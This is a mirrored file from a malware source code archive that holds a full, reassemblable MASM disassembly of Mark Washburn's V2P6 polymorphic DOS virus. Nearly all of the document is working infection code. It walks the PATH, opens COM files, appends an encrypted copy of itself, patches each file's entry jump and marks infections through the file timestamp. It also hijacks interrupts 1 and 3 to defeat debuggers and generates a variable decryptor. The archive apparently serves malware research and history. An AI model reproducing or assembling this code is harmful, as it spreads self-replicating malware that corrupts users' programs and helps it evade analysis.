mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
4b9382ddbc
push
1099 lines
21 KiB
NASM
1099 lines
21 KiB
NASM
|
||
;**********************************************
|
||
; *
|
||
; V2P6.ASM *
|
||
; a *
|
||
; recompilable disassembly *
|
||
; of *
|
||
; Mark Washburn's V2P6 *
|
||
; self-encrypting, *
|
||
; variable-length *
|
||
; virus *
|
||
; - *
|
||
; WRITTEN FOR REASSEMBLY *
|
||
; WITH MICROSOFT MASM ASSEMBLER. *
|
||
; *
|
||
; *
|
||
; 1) The V2P6 uses a "sliding-window" *
|
||
; encryption technique that relies on *
|
||
; Interrupts One and Three. The *
|
||
; "INSERT_ENCRYPTION_TECHNIQUES" call *
|
||
; inserts the appropriate code for *
|
||
; this task. *
|
||
; *
|
||
; 2) Occasionally, NOPS and Interrupt 3 *
|
||
; calls are used as "false code" that *
|
||
; is designed to confuse those who *
|
||
; attempt to disassemble the virus. *
|
||
; THEY are not true INT 3 or NOP *
|
||
; instructions. These attempts are *
|
||
; clearly labeled as such. *
|
||
; *
|
||
;**********************************************
|
||
|
||
CODE_SEG SEGMENT
|
||
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
|
||
ORG 0100H
|
||
V2P6 PROC NEAR
|
||
|
||
THE_BEGINNING:
|
||
JMP SHORT DEGARBLER
|
||
|
||
DB " V2P6.ASM "
|
||
|
||
DEGARBLER:
|
||
CALL INSERT_ENCRYPTION_TECHNIQUES
|
||
DB 36 DUP (090H)
|
||
|
||
;========== Body encryption takes place from here down ===========
|
||
|
||
START:
|
||
MOV BP,SP
|
||
SUB SP,029H
|
||
PUSH CX
|
||
MOV DX,OFFSET VARIABLE_CODE
|
||
MOV WORD PTR[BP-014H],DX
|
||
CLI
|
||
CLD
|
||
|
||
STORE_INTERRUPT_ADDRESSES:
|
||
PUSH DS
|
||
MOV AX,0
|
||
PUSH AX
|
||
POP DS
|
||
CLI
|
||
MOV AX,DS:WORD PTR[4]
|
||
MOV WORD PTR[BP-028H],AX
|
||
MOV AX,DS:WORD PTR[6]
|
||
MOV WORD PTR[BP-026H],AX
|
||
MOV AX,DS:WORD PTR[0CH]
|
||
MOV WORD PTR[BP-024H],AX
|
||
MOV AX,DS:WORD PTR[0EH]
|
||
MOV WORD PTR[BP-022H],AX
|
||
STI
|
||
POP DS
|
||
|
||
REPLACE_INTERRUPT_ADDRESSES:
|
||
CALL REPLACE_ONE_AND_THREE
|
||
MOV SI,DX
|
||
ADD SI,0E4H
|
||
MOV DI,0100H
|
||
MOV CX,3
|
||
CLD
|
||
REP MOVSB
|
||
|
||
CHECK_DOS_VERSION:
|
||
MOV SI,DX
|
||
MOV AH,030H
|
||
INT 021H
|
||
CMP AL,0
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
JNE STORE_THE_DTA
|
||
JMP EXIT
|
||
|
||
STORE_THE_DTA:
|
||
PUSH ES
|
||
MOV AH,02FH
|
||
INT 021H
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV WORD PTR[BP-4],BX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV WORD PTR[BP-2],ES
|
||
POP ES
|
||
|
||
SET_NEW_DTA:
|
||
MOV DX,SI
|
||
ADD DX,0135H
|
||
MOV AH,01AH
|
||
INT 021H
|
||
PUSH ES
|
||
PUSH SI
|
||
MOV ES,DS:WORD PTR[02CH]
|
||
MOV DI,0H
|
||
|
||
FIND_ENVIRONMENT:
|
||
POP SI
|
||
PUSH SI
|
||
ADD SI,0F0H
|
||
LODSB
|
||
MOV CX,08000H
|
||
REPNE SCASB
|
||
MOV CX,4H
|
||
LOOOPER:
|
||
LODSB
|
||
SCASB
|
||
JNE FIND_ENVIRONMENT
|
||
LOOP LOOOPER
|
||
POP SI
|
||
POP ES
|
||
MOV WORD PTR[BP-0CH],DI
|
||
MOV BX,SI
|
||
ADD SI,0F5H
|
||
MOV DI,SI
|
||
JMP SHORT COPY_FILE_SPEC_TO_WORK_AREA
|
||
|
||
NOP
|
||
INT 3 ;False code.
|
||
|
||
NO_FILE_FOUND:
|
||
CMP WORD PTR[BP-0CH],0
|
||
JNE FOLLOW_THE_PATH
|
||
JMP RESTORE_DTA
|
||
|
||
INT 3 ;False code.
|
||
|
||
FOLLOW_THE_PATH:
|
||
PUSH DS
|
||
PUSH SI
|
||
MOV DS,ES:WORD PTR[02CH]
|
||
MOV DI,SI
|
||
MOV SI,ES:WORD PTR[BP-0CH]
|
||
ADD DI,0F5H
|
||
|
||
UP_TO_LODSB:
|
||
LODSB
|
||
CMP AL,03BH
|
||
JE SEARCH_AGAIN
|
||
CMP AL,0
|
||
JE CLEAR_SI
|
||
STOSB
|
||
JMP SHORT UP_TO_LODSB
|
||
|
||
INT 3 ;False code.
|
||
|
||
CLEAR_SI:
|
||
MOV SI,0
|
||
|
||
SEARCH_AGAIN:
|
||
POP BX
|
||
POP DS
|
||
MOV WORD PTR[BP-0CH],SI
|
||
CMP CH,0FFH
|
||
JE COPY_FILE_SPEC_TO_WORK_AREA
|
||
MOV AL,05CH
|
||
STOSB
|
||
|
||
COPY_FILE_SPEC_TO_WORK_AREA:
|
||
MOV WORD PTR[BP-0EH],DI
|
||
MOV SI,BX
|
||
ADD SI,0EAH
|
||
MOV CX,6
|
||
REP MOVSB
|
||
MOV SI,BX
|
||
MOV AH,04EH
|
||
MOV DX,SI
|
||
ADD DX,0F5H
|
||
MOV CX,3
|
||
INT 021H
|
||
JMP SHORT CHECK_CARRY_FLAG
|
||
|
||
NOP ;False code.
|
||
INT 3
|
||
|
||
FIND_NEXT_FILE:
|
||
MOV AH,04FH
|
||
INT 021H
|
||
|
||
CHECK_CARRY_FLAG:
|
||
JAE FILE_FOUND
|
||
JMP SHORT NO_FILE_FOUND
|
||
|
||
INT 3 ;False code.
|
||
|
||
FILE_FOUND:
|
||
MOV AX,WORD PTR[SI+014BH]
|
||
AND AL,01FH
|
||
CMP AL,01FH
|
||
JE FIND_NEXT_FILE
|
||
CMP WORD PTR[SI+014FH],0F902H
|
||
JE FIND_NEXT_FILE
|
||
CMP WORD PTR[SI+014FH],0AH
|
||
JE FIND_NEXT_FILE
|
||
MOV DI,WORD PTR[BP-0EH]
|
||
PUSH SI
|
||
ADD SI,0153H
|
||
|
||
MOVE_ASCII_FILENAME:
|
||
LODSB
|
||
STOSB
|
||
CMP AL,0
|
||
JNE MOVE_ASCII_FILENAME
|
||
POP SI
|
||
|
||
GET_FILE_ATTRIBUTE:
|
||
MOV AX,04300H
|
||
MOV DX,SI
|
||
ADD DX,0F5H
|
||
INT 021H
|
||
|
||
STORE_FILE_ATTRIBUTE:
|
||
MOV WORD PTR[BP-0AH],CX
|
||
|
||
CLEAR_FILE_ATTRIBUTE:
|
||
MOV AX,04301H
|
||
AND CX,-2
|
||
MOV DX,SI
|
||
ADD DX,0F5H
|
||
INT 021H
|
||
|
||
OPEN_FILE:
|
||
MOV AX,03D02H
|
||
MOV DX,SI
|
||
ADD DX,0F5H
|
||
INT 021H
|
||
JAE GET_DATE_AND_TIME
|
||
JMP SET_THE_ATTRIBUTE
|
||
|
||
INT 3 ;False code.
|
||
|
||
GET_DATE_AND_TIME:
|
||
MOV BX,AX
|
||
MOV AX,05700H
|
||
INT 021H
|
||
|
||
STORE_DATE_AND_TIME:
|
||
MOV WORD PTR[BP-8],CX
|
||
MOV WORD PTR[BP-6],DX
|
||
|
||
READ_FIRST_THREE_BYTES:
|
||
MOV AH,03FH
|
||
MOV CX,3
|
||
MOV DX,SI
|
||
ADD DX,0E4H
|
||
INT 021H
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
JB ERROR_OCCURRED
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CMP AX,3
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
JNE ERROR_OCCURRED
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
|
||
GET_FILE_LENGTH:
|
||
MOV AX,04202H
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV CX,0
|
||
MOV DX,0
|
||
INT 021H
|
||
JAE AT_END_OF_FILE
|
||
|
||
ERROR_OCCURRED:
|
||
JMP SET_DATE_AND_CLOSE_FILE
|
||
|
||
AT_END_OF_FILE:
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
PUSH BX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV CX,AX
|
||
PUSH CX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
SUB AX,3
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV WORD PTR[SI+0E8H],AX
|
||
ADD CX,06CDH
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV DI,SI
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
SUB DI,059FH
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV WORD PTR[DI],CX
|
||
MOV AH,02CH
|
||
INT 021H
|
||
XOR DX,CX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV CX,WORD PTR[SI+0E2H]
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
XOR CX,DX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV WORD PTR[SI+0E2H],DX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV WORD PTR[BP-01EH],DX
|
||
|
||
CREATE_THE_DEGARBLER:
|
||
CALL DEGARB_CALL_THREE
|
||
MOV AL,BYTE PTR[BP-01EH]
|
||
AND AL,3
|
||
CMP AL,3
|
||
JE CREATE_THE_DEGARBLER
|
||
PUSH AX
|
||
ROR AL,1
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
ROR AL,1
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BYTE PTR[SI+O10H],AL
|
||
POP AX
|
||
ADD AL,2
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BYTE PTR[SI+O3CH],AL
|
||
|
||
CREATE_DEGARBLER_PART_TWO:
|
||
CALL DEGARB_CALL_THREE
|
||
MOV AL,BYTE PTR[BP-01EH]
|
||
AND AL,7
|
||
CMP AL,6
|
||
JA CREATE_DEGARBLER_PART_TWO
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BYTE PTR[BP-01BH],AL
|
||
PUSH AX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
XOR AH,AH
|
||
SHL AX,1
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
INC AX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BX,SI
|
||
ADD BX,[O5CH]
|
||
ADD BX,AX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV DL,BYTE PTR[BX]
|
||
POP AX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CMP AL,3
|
||
JA CREATE_DEGARBLER_PART_FOUR
|
||
|
||
CREATE_DEGARBLER_PART_THREE:
|
||
CALL DEGARB_CALL_THREE
|
||
AND AL,DL
|
||
JE CREATE_DEGARBLER_PART_THREE
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BYTE PTR[BP-01CH],AL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
PUSH AX
|
||
MOV BL,AL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
NOT BL
|
||
AND DL,BL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CALL DEGARB_CALL_TWO
|
||
MOV AL,DL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
XOR DH,DH
|
||
SHL DX,1
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BX,SI
|
||
ADD BX,[O24H]
|
||
ADD BX,DX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BX,WORD PTR[BX]
|
||
MOV WORD PTR[SI+ODH],BX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BL,080H
|
||
MOV BYTE PTR[BP-010H],BL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
POP DX
|
||
CALL DEGARB_CALL_TWO
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV DH,DL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV DL,AL
|
||
JMP SHORT CREATE_DEGARBLER_PART_FIVE
|
||
|
||
CREATE_DEGARBLER_PART_FOUR:
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BYTE PTR[BP-01CH],DL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CALL DEGARB_CALL_TWO
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV DH,DL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
REAL_NOPS:
|
||
MOV BX,09090H
|
||
MOV WORD PTR[SI+ODH],BX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
XOR DL,DL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV BYTE PTR[BP-010H],DL
|
||
MOV DL,0FFH
|
||
|
||
CREATE_DEGARBLER_PART_FIVE:
|
||
CALL DEGARB_CALL_THREE
|
||
MOV AL,BYTE PTR[BP-01EH]
|
||
AND AL,0FH
|
||
CMP AL,0CH
|
||
JA CREATE_DEGARBLER_PART_FIVE
|
||
CMP AL,DH
|
||
JE CREATE_DEGARBLER_PART_FIVE
|
||
CMP AL,DL
|
||
JE CREATE_DEGARBLER_PART_FIVE
|
||
MOV BYTE PTR[BP-0FH],AL
|
||
XOR AH,AH
|
||
SHL AX,1
|
||
SHL AX,1
|
||
MOV BX,SI
|
||
ADD BX,[O6AH]
|
||
ADD BX,AX
|
||
MOV CL,BYTE PTR[BX]
|
||
MOV AL,031H
|
||
TEST CL,8
|
||
JNE OVER_ONE
|
||
MOV AL,030H
|
||
OVER_ONE:
|
||
MOV BYTE PTR[SI+0DBH],AL
|
||
MOV BYTE PTR[SI+OFH],AL
|
||
MOV AL,5
|
||
TEST CL,8
|
||
JNE OVER_SEVERAL
|
||
TEST CL,4
|
||
JE OVER_SEVERAL
|
||
MOV AL,025H
|
||
OVER_SEVERAL:
|
||
MOV BYTE PTR[SI+0DCH],AL
|
||
MOV AL,BYTE PTR[SI+O10H]
|
||
AND CL,7
|
||
XOR CH,CH
|
||
SHL CX,1
|
||
SHL CX,1
|
||
SHL CX,1
|
||
OR AL,CL
|
||
MOV CL,BYTE PTR[BP-01BH]
|
||
SHL CX,1
|
||
MOV BX,SI
|
||
ADD BX,[O5CH]
|
||
ADD BX,CX
|
||
MOV CL,BYTE PTR[BX]
|
||
OR AL,CL
|
||
MOV BYTE PTR[SI+O10H],AL
|
||
MOV BX,SI
|
||
ADD BX,[O6AH]
|
||
XOR CL,CL
|
||
MOV BYTE PTR[BP-01BH],CL
|
||
MOV AL,BYTE PTR[BP-0FH]
|
||
CMP AL,9
|
||
JA THREE_ADJUSTMENTS
|
||
XOR AH,AH
|
||
SHL AX,1
|
||
SHL AX,1
|
||
ADD BX,AX
|
||
INC BX
|
||
MOV AL,BYTE PTR[BX]
|
||
MOV BYTE PTR[SI+O1BH],AL
|
||
INC BX
|
||
INC BX
|
||
MOV AL,BYTE PTR[BX]
|
||
MOV BYTE PTR[SI+O6],AL
|
||
MOV BX,SI
|
||
ADD BX,[O6AH]
|
||
JMP SHORT NO_ADJUSTMENT
|
||
|
||
INT 3 ;False code.
|
||
|
||
THREE_ADJUSTMENTS:
|
||
MOV CL,0FFH
|
||
MOV BYTE PTR[BP-01BH],CL
|
||
MOV CL,090H
|
||
MOV BYTE PTR[SI+O1BH],CL
|
||
MOV CL,0B8H
|
||
MOV BYTE PTR[SI+O6],CL
|
||
|
||
NO_ADJUSTMENT:
|
||
MOV DL,BYTE PTR[BP-01CH]
|
||
CALL DEGARB_CALL_TWO
|
||
XOR DH,DH
|
||
SHL DX,1
|
||
SHL DX,1
|
||
ADD BX,DX
|
||
INC BX
|
||
INC BX
|
||
MOV AL,BYTE PTR[BX]
|
||
MOV BYTE PTR[SI+O1AH],AL
|
||
INC BX
|
||
MOV AL,BYTE PTR[BX]
|
||
MOV BYTE PTR[SI+ZERO],AL
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CALL DEGARB_CALL_THREE
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV AX,WORD PTR[BP-01EH]
|
||
AND AX,0FFH
|
||
ADD AX,0709H
|
||
MOV WORD PTR[BP-018H],AX
|
||
MOV WORD PTR[SI+O4],AX
|
||
POP CX
|
||
ADD CX,0127H
|
||
MOV WORD PTR[SI+O1],CX
|
||
MOV CL,BYTE PTR[BP-01BH]
|
||
OR CL,CL
|
||
JNE CREATE_DEGARBLER_PART_SIX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CALL DEGARB_CALL_THREE
|
||
MOV AX,WORD PTR[BP-01EH]
|
||
MOV WORD PTR[SI+O7],AX
|
||
|
||
CREATE_DEGARBLER_PART_SIX:
|
||
MOV WORD PTR[BP-016H],AX
|
||
MOV DI,SI
|
||
SUB DI,05CDH
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV AX,3
|
||
MOV CL,BYTE PTR[BP-010H]
|
||
OR AL,CL
|
||
MOV CL,BYTE PTR[BP-01BH]
|
||
OR CL,CL
|
||
JNE OVER_OR
|
||
OR AX,4
|
||
OVER_OR:
|
||
MOV BX,SI
|
||
ADD BX,[O2CH]
|
||
MOV WORD PTR[BP-01AH],AX
|
||
CALL DEGARB_CALL_FIVE
|
||
MOV WORD PTR[BP-012H],DI
|
||
REAL_NOP:
|
||
ADD BX,[OO10H]
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV AX,1
|
||
CALL DEGARB_CALL_ONE
|
||
MOV WORD PTR[BP-01AH],AX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CALL DEGARB_CALL_FIVE
|
||
ADD BX,[OO10H]
|
||
MOV AX,1
|
||
MOV CL,BYTE PTR[BP-01BH]
|
||
OR CL,CL
|
||
JNE OVER_THE_OR
|
||
OR AX,2
|
||
OVER_THE_OR:
|
||
CALL DEGARB_CALL_ONE
|
||
MOV WORD PTR[BP-01AH],AX
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
CALL DEGARB_CALL_FIVE
|
||
MOV CX,2
|
||
MOV SI,WORD PTR[BP-014H]
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
ADD SI,[O22H]
|
||
REP MOVSB
|
||
MOV AX,WORD PTR[BP-012H]
|
||
SUB AX,DI
|
||
DEC DI
|
||
STOSB
|
||
|
||
LAST_STEP:
|
||
MOV CX,WORD PTR[BP-014H]
|
||
SUB CX,05A6H
|
||
CMP CX,DI
|
||
JE COPY_ENC_AND_WRITE_TO_MEMORY
|
||
MOV DX,0
|
||
CALL DEGARB_CALL_FOUR
|
||
JMP SHORT LAST_STEP
|
||
|
||
INT 3 ;False code.
|
||
|
||
COPY_ENC_AND_WRITE_TO_MEMORY:
|
||
MOV SI,WORD PTR[BP-014H]
|
||
PUSH SI
|
||
MOV DI,SI
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV CX,044H
|
||
ADD SI,09EH
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
ADD DI,0262H
|
||
MOV DX,DI
|
||
REP MOVSB
|
||
POP SI
|
||
POP BX
|
||
CALL GET_OFFSET
|
||
ADD AX,6
|
||
PUSH AX
|
||
JMP DX
|
||
|
||
WRITE_NEW_JUMP:
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
JB SET_DATE_AND_CLOSE_FILE
|
||
MOV AX,04200H
|
||
MOV CX,0
|
||
MOV DX,0
|
||
INT 021H
|
||
JB SET_DATE_AND_CLOSE_FILE
|
||
MOV AH,040H
|
||
MOV CX,3
|
||
NOP ;Breakpoint Encryption.
|
||
NOP
|
||
MOV DX,SI
|
||
ADD DX,0E7H
|
||
INT 021H
|
||
|
||
SET_DATE_AND_CLOSE_FILE:
|
||
MOV DX,WORD PTR[BP-6]
|
||
MOV CX,WORD PTR[BP-8]
|
||
AND CX,-020H
|
||
OR CX,01FH
|
||
MOV AX,05701H
|
||
INT 021H
|
||
MOV AH,03EH
|
||
INT 021H
|
||
|
||
SET_THE_ATTRIBUTE:
|
||
MOV AX,04301H
|
||
MOV CX,WORD PTR[BP-0AH]
|
||
MOV DX,SI
|
||
ADD DX,0F5H
|
||
INT 021H
|
||
|
||
RESTORE_DTA:
|
||
PUSH DS
|
||
MOV DX,WORD PTR[BP-4]
|
||
MOV DS,WORD PTR[BP-2]
|
||
MOV AH,01AH
|
||
INT 021H
|
||
POP DS
|
||
|
||
EXIT:
|
||
POP CX
|
||
MOV SP,BP
|
||
MOV DI,0100H
|
||
PUSH DI
|
||
XOR AX,AX
|
||
XOR BX,BX
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
XOR SI,SI
|
||
XOR BP,BP
|
||
XOR DI,DI
|
||
JMP RESTORE_ONE_AND_THREE
|
||
|
||
;========= Calls used to create the Degarbler ===========
|
||
|
||
DEGARB_CALL_ONE:
|
||
PUSH AX
|
||
CALL DEGARB_CALL_THREE
|
||
MOV CL,AL
|
||
MOV CH,BYTE PTR[BP-01EH]
|
||
POP AX
|
||
CMP CH,080H
|
||
JA TO_RET
|
||
XOR CH,CH
|
||
OR AX,CX
|
||
TO_RET:
|
||
RET
|
||
|
||
DEGARB_CALL_TWO:
|
||
PUSH AX
|
||
MOV AL,0
|
||
UP_TO_SHIFT:
|
||
SHR DL,1
|
||
JB RIGHT_HERE
|
||
INC AL
|
||
JMP SHORT UP_TO_SHIFT
|
||
RIGHT_HERE:
|
||
MOV DL,AL
|
||
POP AX
|
||
RET
|
||
|
||
INT 3 ;False code.
|
||
|
||
DEGARB_CALL_THREE:
|
||
MOV CX,WORD PTR[BP-01EH]
|
||
XOR CX,0813CH
|
||
ADD CX,09249H
|
||
ROR CX,1
|
||
ROR CX,1
|
||
ROR CX,1
|
||
MOV WORD PTR[BP-01EH],CX
|
||
AND CX,7
|
||
PUSH CX
|
||
INC CX
|
||
XOR AX,AX
|
||
STC
|
||
RCL AX,CL
|
||
POP CX
|
||
RET
|
||
|
||
GET_OFFSET:
|
||
POP AX
|
||
PUSH AX
|
||
RET
|
||
|
||
DEGARB_CALL_FOUR:
|
||
CALL DEGARB_CALL_THREE
|
||
TEST DX,AX
|
||
JNE DEGARB_CALL_FOUR
|
||
OR DX,AX
|
||
MOV AX,CX
|
||
SHL AX,1
|
||
PUSH AX
|
||
XLATB
|
||
MOV CX,AX
|
||
POP AX
|
||
INC AX
|
||
XLATB
|
||
ADD AX,WORD PTR[BP-014H]
|
||
MOV SI,AX
|
||
REP MOVSB
|
||
RET
|
||
|
||
DEGARB_CALL_FIVE:
|
||
MOV DX,0
|
||
PRETTY_PLACE:
|
||
CALL DEGARB_CALL_FOUR
|
||
MOV AX,DX
|
||
AND AX,WORD PTR[BP-01AH]
|
||
CMP AX,WORD PTR[BP-01AH]
|
||
JNE PRETTY_PLACE
|
||
RET
|
||
|
||
;====== Encryption and debugger stopping routines =======
|
||
|
||
NEW_INT_THREE:
|
||
PUSH BX
|
||
MOV BX,SP
|
||
PUSH AX
|
||
PUSH SI
|
||
PUSH DS
|
||
PUSH CS
|
||
POP DS
|
||
OR BYTE PTR[BX+7],1
|
||
MOV SI,WORD PTR[BX+2]
|
||
INC WORD PTR[BX+2]
|
||
MOV WORD PTR[BP-020H],SI
|
||
LODSB
|
||
XOR BYTE PTR[SI],AL
|
||
IN AL,021H
|
||
MOV BYTE PTR[BP-029H],AL
|
||
MOV AL,0FFH
|
||
OUT 021H,AL
|
||
POP DS
|
||
POP SI
|
||
POP AX
|
||
POP BX
|
||
IRET
|
||
|
||
NEW_INT_ONE:
|
||
PUSH BX
|
||
MOV BX,SP
|
||
PUSH AX
|
||
AND SS:BYTE PTR[BX+7],0FEH
|
||
MOV BX,WORD PTR[BP-020H]
|
||
MOV AL,CS:BYTE PTR[BX]
|
||
XOR CS:BYTE PTR[BX+1],AL
|
||
MOV AL,BYTE PTR[BP-029H]
|
||
OUT 021H,AL
|
||
MOV AL,020H
|
||
OUT 020H,AL
|
||
POP AX
|
||
POP BX
|
||
IRET
|
||
|
||
REPLACE_ONE_AND_THREE:
|
||
PUSHF
|
||
PUSH DS
|
||
PUSH AX
|
||
MOV AX,0
|
||
PUSH AX
|
||
POP DS
|
||
MOV AX,WORD PTR[BP-014H]
|
||
SUB AX,093H
|
||
CLI
|
||
MOV DS:WORD PTR[000CH],AX
|
||
MOV AX,WORD PTR[BP-014H]
|
||
SUB AX,06DH
|
||
MOV DS:WORD PTR[0004],AX
|
||
PUSH CS
|
||
POP AX
|
||
MOV DS:WORD PTR[0006],AX
|
||
MOV DS:WORD PTR[000EH],AX
|
||
STI
|
||
POP AX
|
||
POP DS
|
||
POPF
|
||
RET
|
||
|
||
RESTORE_ONE_AND_THREE:
|
||
PUSHF
|
||
PUSH DS
|
||
PUSH AX
|
||
MOV AX,0
|
||
PUSH AX
|
||
POP DS
|
||
MOV AX,WORD PTR[BP-024H]
|
||
CLI
|
||
MOV DS:WORD PTR[000CH],AX
|
||
MOV AX,WORD PTR[BP-028H]
|
||
MOV DS:WORD PTR[0004],AX
|
||
MOV AX,WORD PTR[BP-026H]
|
||
MOV DS:WORD PTR[0006],AX
|
||
MOV AX,WORD PTR[BP-022H]
|
||
MOV DS:WORD PTR[000EH],AX
|
||
STI
|
||
POP AX
|
||
POP DS
|
||
POPF
|
||
RET
|
||
|
||
;============= The Variable Code ===============
|
||
|
||
VARIABLE_CODE:
|
||
MOV SI,0
|
||
MOV CX,0
|
||
MOV DX,0
|
||
NOP
|
||
CLC
|
||
STC
|
||
CLD
|
||
XOR BP,BP
|
||
|
||
XORING_HERE:
|
||
XOR WORD PTR[BP+SI],DX
|
||
ADD BYTE PTR[BX+SI],AL
|
||
STC
|
||
CMC
|
||
CLC
|
||
CLD
|
||
STI
|
||
NOP
|
||
CLC
|
||
INC SI
|
||
DEC DX
|
||
CLD
|
||
CMC
|
||
STI
|
||
CLC
|
||
STC
|
||
NOP
|
||
LOOP XORING_HERE
|
||
XOR BP,BP
|
||
XOR BX,BX
|
||
XOR DI,DI
|
||
XOR SI,SI
|
||
ADD AX,WORD PTR[BX+SI]
|
||
ADD AX,WORD PTR[BP+DI]
|
||
ADD AX,DS:WORD PTR[0901H]
|
||
ADD WORD PTR[BP+SI],CX
|
||
ADD WORD PTR[BP+DI],CX
|
||
ADD WORD PTR[SI],CX
|
||
ADD CL,BYTE PTR[DI]
|
||
ADD CL,BYTE PTR[BX]
|
||
ADD WORD PTR[BP+DI],DX
|
||
ADD WORD PTR[SI],DX
|
||
ADD WORD PTR[DI],DX
|
||
ADD DS:WORD PTR[01701H],DX
|
||
ADD WORD PTR[BX+SI],BX
|
||
ADD WORD PTR[BX+DI],BX
|
||
ADD WORD PTR[BP+SI],BX
|
||
ADD WORD PTR[BP+DI],BX
|
||
ADD WORD PTR[SI],BX
|
||
ADD WORD PTR[DI],BX
|
||
ADD DS:WORD PTR[01F01H],BX
|
||
ADD WORD PTR[BX+SI],SP
|
||
ADD WORD PTR[BX+DI],SP
|
||
ADD BYTE PTR[BP+SI],CL
|
||
ADD DS:WORD PTR[0902H],AX
|
||
ADD AX,WORD PTR[DI]
|
||
ADD AL,8
|
||
ADD AX,0704H
|
||
ADD CL,BYTE PTR[DI]
|
||
DEC BP
|
||
INC BP
|
||
MOV BP,04B0BH
|
||
INC BX
|
||
MOV BX,04F0FH
|
||
INC DI
|
||
MOV DI,04E0EH
|
||
INC SI
|
||
MOV SI,04808H
|
||
INC AX
|
||
MOV AX,04800H
|
||
INC AX
|
||
MOV AX,04804H
|
||
INC AX
|
||
MOV AX,04A0AH
|
||
INC DX
|
||
MOV DX,04A02H
|
||
INC DX
|
||
MOV DX,04A06H
|
||
INC DX
|
||
MOV DX,9
|
||
ADD BYTE PTR[BX+SI],AL
|
||
ADD WORD PTR[BX+SI],AX
|
||
ADD BYTE PTR[BX+SI],AL
|
||
ADD AX,0
|
||
DB 0
|
||
|
||
;======= Only the Memory Image of the following code =====
|
||
;======= is ever executed =====
|
||
|
||
ENCRYPT_WRITE_AND_DECRYPT:
|
||
MOV CX,WORD PTR[BP-018H]
|
||
MOV AX,WORD PTR[BP-016H]
|
||
MOV DI,SI
|
||
SUB DI,05A6H
|
||
CALL ENCRYPT_BODY
|
||
MOV AH,040H
|
||
MOV DX,WORD PTR[BP-01EH]
|
||
AND DX,0FFH
|
||
MOV CX,WORD PTR[BP-018H]
|
||
ADD CX,[O27H]
|
||
ADD CX,DX
|
||
MOV DX,SI
|
||
SUB DX,05CDH
|
||
INT 021H
|
||
PUSHF
|
||
PUSH AX
|
||
MOV CX,WORD PTR[BP-018H]
|
||
MOV AX,WORD PTR[BP-016H]
|
||
MOV DI,SI
|
||
SUB DI,05A6H
|
||
CALL ENCRYPT_BODY
|
||
POP AX
|
||
POPF
|
||
RET
|
||
|
||
ENCRYPT_BODY:
|
||
XOR WORD PTR[DI],AX
|
||
DEC AX
|
||
INC DI
|
||
LOOP ENCRYPT_BODY
|
||
RET
|
||
|
||
;================= Data Section begins here ===============
|
||
|
||
RANDOM_KEY:
|
||
DB 006H, 02CH
|
||
|
||
STORAGE_OF_INITIAL_JUMP:
|
||
DB 0E9H, 0FDH, 0FEH
|
||
|
||
